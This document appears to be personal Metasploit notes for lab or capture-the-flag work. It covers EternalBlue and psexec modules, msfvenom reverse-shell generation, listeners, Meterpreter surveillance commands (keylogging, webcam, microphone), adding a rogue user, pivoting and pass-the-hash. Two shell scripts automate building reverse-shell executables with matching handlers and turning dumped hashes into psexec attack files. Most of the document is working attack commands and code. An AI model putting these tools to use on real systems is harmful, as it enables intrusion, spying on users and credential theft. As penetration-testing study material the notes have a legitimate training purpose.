Metasploit
REF:
Metasploit Framework
msfconsole
search Nostromo ..search <keyword> inside msfconsole
use exploit/multi/http/nostromo_code_exec
show options ..check RHOSTS/LHOST/LPORT before 'exploit'
Module path format: type/platform/service/name, e.g. exploit/multi/http/nostromo_code_exec
Types: exploit, payload, auxiliary, post (plus encoder, nop)
Eternal Blue
ms17_010_eternalblue.rb ..EternalBlue: kernel-pool corruption in SMBv1, messy, can BSOD the target
.. get out of this as soon as you can and use psexec
ms17_010_psexec.rb ..same MS17-010 bug, friendly version: far less likely to crash
.. hijacks an SMB session via the bug (no creds needed), uploads a file, runs it as a service like psexec
(ms08_067_netapi.rb is a different, older SMB bug, MS08-067 on XP/2003; not EternalBlue)
.. Pentesters Pledge!!
Venom
msfvenom -l payloads | grep windows
msfvenom --list encoders
msfvenom --list formats
msfvenom --list payloads | grep java
msfvenom --help-formats ..older versions; newer ones use --list formats
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.X.X LPORT=8080 -f exe > /tmp/file.exe ..staged (shell/ not shell_); the handler must use the exact same payload name
python3 -m http.server ..share with python (optional)
Silly Windows Powershell "Hello":
Create "hi.exe"
Opens Windows Powershell
Prints "Hello World"
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"Write-Output 'Hello World'\"; pause" -f exe > hi.exe
Listener
> sudo msfconsole
show exploits ..rank column means:
excellent - never crashes the service (SQLi, command injection, file include...; no memory corruption)
great - has a default target and auto-detects the right one, or uses an app-specific return address after a version check
good - default target is the common case for that software
normal - reliable, but depends on a specific version and can't auto-detect it
average - unreliable or hard to exploit
low - nearly impossible (under 50%) on common platforms
manual - unstable / basically a DoS, or useless until you configure it by hand
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp ..same as venom
show options
set LPORT 8080 ..same as venom/incoming
set LHOST 0.0.0.0 ..listen on all interfaces (the exe calls back to the LHOST baked in by msfvenom)
exploit -j ..job to background
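The venom and listener halves above only work when payload name, LPORT and the LHOST seen by the target agree. As an added example (not from these notes), this POSIX shell script builds the executable and writes a matching msfconsole resource file from one set of variables, so the handler is started with `msfconsole -q -r /tmp/handler.rc` and cannot drift from what was compiled in. The address 10.10.14.5, the /tmp paths and the `build` argument are assumptions.

```shell
#!/bin/sh
# Build a staged reverse shell with msfvenom and write a matching
# multi/handler resource file from the same variables, so payload name,
# LPORT and LHOST cannot drift apart. Added example, not from the notes;
# the address 10.10.14.5 and the /tmp paths are assumptions.
set -eu

PAYLOAD="${PAYLOAD:-windows/shell/reverse_tcp}"   # staged: handler must match exactly
LHOST="${LHOST:-10.10.14.5}"                       # attacker address as the target sees it (assumed)
LPORT="${LPORT:-8080}"
OUT="${OUT:-/tmp/file.exe}"
RC="${RC:-/tmp/handler.rc}"

# Resource-file text for a handler matching payload $1 on port $2.
# The handler binds 0.0.0.0; the stager dials the LHOST baked into the exe
# and the stage is sent back down that same connection.
handler_rc() {
  printf 'use exploit/multi/handler\n'
  printf 'set PAYLOAD %s\n' "$1"
  printf 'set LHOST 0.0.0.0\n'
  printf 'set LPORT %s\n' "$2"
  printf 'set ExitOnSession false\n'   # keep listening after the first shell
  printf 'exploit -j -z\n'             # background job, do not auto-interact
}

# 0 when $1 is an integer in 1..65535.
valid_port() {
  case "$1" in
    ''|*[!0-9]*) return 1 ;;
  esac
  if [ "$1" -ge 1 ] && [ "$1" -le 65535 ]; then return 0; fi
  return 1
}

# 0 when $1 is a dotted-quad IPv4 address with every octet <= 255.
valid_ipv4() {
  if ! printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'; then
    return 1
  fi
  for o in $(printf '%s\n' "$1" | tr '.' ' '); do
    if [ "$o" -gt 255 ]; then return 1; fi
  done
  return 0
}

main() {
  valid_port "$LPORT" || { echo "bad LPORT: $LPORT" >&2; exit 1; }
  valid_ipv4 "$LHOST" || { echo "bad LHOST: $LHOST" >&2; exit 1; }
  handler_rc "$PAYLOAD" "$LPORT" > "$RC"
  if command -v msfvenom >/dev/null 2>&1; then
    msfvenom -p "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" -f exe -o "$OUT"
    echo "payload: $OUT"
  else
    echo "msfvenom not on PATH; wrote $RC only" >&2
  fi
  echo "start the listener with: msfconsole -q -r $RC"
}

# usage: sh build_handler.sh build   (LHOST=... LPORT=... to override)
if [ "${1:-}" = "build" ]; then main; fi
```

Run it as `LHOST=10.10.14.5 sh build_handler.sh build`; the resource file sets ExitOnSession false so one handler keeps catching callbacks from every copy of the exe.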
Sessions
Ctrl-Z or 'background' ..leave the session running and drop back to msf>
Ctrl-C ..abort the session you are in (asks y/N)
jobs ..jobs listening
sessions -h ..help
sessions -K ..Kill all sessions
sessions -l ..list
sessions -i 1 ..interact
Shell
(no autocomplete)
whoami
netstat -na
tasklist
cd c:\
dir
ipconfig
ipconfig /displaydns
net user
net user bob Password1 /add
PrivEsc
getuid .. www
use priv ..load the priv extension (same as 'load priv'; recent versions load it for you)
getsystem ..tries the built-in techniques (named-pipe impersonation, token duplication); needs local admin to start with
getuid .. system
Meterpreter
? ..help
cd ..change dir
lcd ..local cd
pwd
ls
cat
download
mkdir
edit ..don't trust this though
sysinfo
shutdown
reboot
reg ..registry
shell ..go to the 'normal shell'
exit
kill
execute
screenshot -p my.jpg
screenshot -p /tmp/screen.jpg
idletime
uictl [enable/disable] [keyboard/mouse]
webcam_list
webcam_snap
record_mic
keyscan_start ..keylogging
keyscan_dump ..view
keyscan_stop
(Could force putty to crash, and capture their login!)
Migrate
getuid ..userid
getpid ..2952
ps ..process list
ps -h ..process list (help)
ps -S notepad ..search for notepad
migrate 3996 ..migrate into notepad
getpid ..3996
Looking Around
mtp> run post/windows/gather/win_privs ..what privileges/integrity the session has
mtp> shell
cd \ & dir /b /s proof.txt ..find the flag from the drive root
type c:\pathto\proof.txt
Pivot
use exploit1
set RHOST victim1
set PAYLOAD xyz
exploit
mtp> ctrl-z or background
msf> route add <victim2 subnet> <netmask> <session id> ..e.g. route add 10.10.20.0 255.255.255.0 1
msf> route print ..check it
(same thing from inside the session: run autoroute -s 10.10.20.0/24)
use exploit2
set RHOST victim2
set PAYLOAD xyz
exploit
Did not try this one:
mtp> portfwd add -l 5555 -p 22 -r Target2 ..local 5555 -> Target2:22 through the session; then ssh -p 5555 127.0.0.1
Pass the Hash
Pass the HASH to Metasploit
Must come from: SAM (plus the SYSTEM hive for the boot key), LSASS memory, or ntds.dit
Not sniffed from the network: that is a NetNTLM challenge/response, not the NT hash (crack or relay it instead)
Note: UAC remote restrictions give local accounts other than the built-in Administrator (RID 500) a filtered token over the network, and the 2014 update (KB2871997) added the "Local account" SIDs so admins can deny their network logon outright
.. expect PtH with a non-500 local account to fail
msfconsole
msf> use exploit/windows/smb/psexec
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> show options
msf> set RHOSTS 10.10.10.10
msf> set LHOST 10.10.x.x
msf> set SMBDomain . ..default ('.' = local account); set the domain name for a domain account
msf> set SMBUser monk
msf> set SMBPass LMHASHXXX:NTHASHXXX ..32 hex chars each; no LM hash? use aad3b435b51404eeaad3b435b51404ee for the LM half
msf> exploit ..error: Exploit failed ActiveRecord
msf> db_disconnect ..fix the bug in metasploit
msf> exploit ..win!
getuid
getpid
ifconfig
shell
net user
net user bob Password1 /add
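The SMBPass format is the usual stumbling point: psexec wants LM:NT, hashdump gives user:rid:lm:nt:::, and modern boxes store no LM hash at all. As an added example (not from these notes), this POSIX shell script turns a hashdump-style line into a psexec resource file, substitutes the empty-LM value when the LM half is missing, and warns when the account is a local non-RID-500 user that UAC remote restrictions will hand a filtered token. The sample lines are constructed (the NT hashes of an empty password and of "password", both public values), and 10.10.10.10 / 10.10.14.5 are assumed addresses.

```shell
#!/bin/sh
# Turn a hashdump/pwdump-style line (user:rid:lmhash:nthash:::) into a
# psexec resource file for pass-the-hash. Added example, not from the
# notes. Sample lines below are constructed (empty password and "password",
# both well-known NT hashes), not real loot; hosts are assumptions.
set -eu

EMPTY_LM="aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" (modern Windows stores no LM)

# 0 when $1 is exactly 32 hex characters.
is_hex32() {
  case "$1" in
    *[!0-9a-fA-F]*) return 1 ;;
  esac
  if [ "${#1}" -eq 32 ]; then return 0; fi
  return 1
}

# Normalise "LM:NT", ":NT" or a bare "NT" into the lowercase LM:NT string
# that SMBPass expects; substitutes the empty-LM value when LM is absent.
normalize_hash() {
  case "$1" in
    *:*) lm="${1%%:*}"; nt="${1##*:}" ;;
    *)   lm="";          nt="$1" ;;
  esac
  if [ -z "$lm" ]; then lm="$EMPTY_LM"; fi
  if ! is_hex32 "$lm" || ! is_hex32 "$nt"; then
    echo "bad hash: $1" >&2
    return 1
  fi
  printf '%s:%s\n' "$lm" "$nt" | tr 'A-F' 'a-f'
}

# Resource file for psexec: $1 hashdump line, $2 RHOSTS, $3 LHOST,
# $4 domain ("." = local account, the msf default).
psexec_rc() {
  line="$1"; rhost="$2"; lhost="$3"; domain="${4:-.}"
  user="$(printf '%s\n' "$line" | cut -d: -f1)"
  rid="$(printf '%s\n' "$line" | cut -d: -f2)"
  lm="$(printf '%s\n' "$line" | cut -d: -f3)"
  nt="$(printf '%s\n' "$line" | cut -d: -f4)"
  hash="$(normalize_hash "$lm:$nt")" || return 1
  # Only the built-in Administrator (RID 500) gets a full admin token over
  # SMB by default; other local admins get a filtered token (UAC remote
  # restrictions) and psexec cannot create its service.
  if [ "$domain" = "." ] && [ "$rid" != "500" ]; then
    echo "warning: $user is local RID $rid, expect a filtered token / access denied" >&2
  fi
  printf 'use exploit/windows/smb/psexec\n'
  printf 'set PAYLOAD windows/meterpreter/reverse_tcp\n'
  printf 'set RHOSTS %s\n' "$rhost"
  printf 'set LHOST %s\n' "$lhost"
  printf 'set SMBDomain %s\n' "$domain"
  printf 'set SMBUser %s\n' "$user"
  printf 'set SMBPass %s\n' "$hash"
  printf 'exploit\n'
}

# Constructed sample lines (not real loot).
SAMPLE_ADMIN="Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::"
SAMPLE_BOB="bob:1001::8846f7eaee8fb117ad06bdd830b7586c:::"

# usage: sh pth_rc.sh 'hashdump line' RHOSTS LHOST [DOMAIN] > psexec.rc
#        then: msfconsole -q -r psexec.rc
if [ $# -ge 3 ]; then psexec_rc "$1" "$2" "$3" "${4:-.}"; fi
```

Pass the domain as the fourth argument for a domain account; with the default "." the script assumes a local account and warns unless the RID is 500.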